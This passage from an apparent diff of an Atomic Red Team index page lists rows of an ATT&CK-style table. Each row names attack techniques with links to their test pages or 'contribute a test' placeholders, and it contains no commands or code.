-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Hide Artifacts: Email Hiding Rules](../../T1564.008/T1564.008.md) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Sniffing](../../T1040/T1040.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Network Share Discovery](../../T1135/T1135.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Network Sniffing](../../T1040/T1040.md) | [System Information Discovery](../../T1082/T1082.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Archive Collected Data](../../T1560/T1560.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | [Software Deployment Tools](../../T1072/T1072.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
-| | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | | [Video Capture](../../T1125/T1125.md) | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| | [Inter-Process Communication](../../T1559/T1559.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [File and Directory Discovery](../../T1083/T1083.md) | | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
-| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Log Enumeration](../../T1654/T1654.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
-| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
-| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Application Access Token](../../T1528/T1528.md) | [Query Registry](../../T1012/T1012.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
-| | | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [System Location Discovery](../../T1614/T1614.md) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
-| | | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Service Discovery](../../T1526/T1526.md) | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | | |
-| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | | |
-| | | [Time Providers](../../T1547.003/T1547.003.md) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | |
-| | | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Debugger Evasion](../../T1622/T1622.md) | | | | | |
-| | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indirect Command Execution](../../T1202/T1202.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [System Time Discovery](../../T1124/T1124.md) | | | | | |
-| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses](../../T1562/T1562.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | | |
-| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Process Injection](../../T1055/T1055.md) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
-| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
-| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
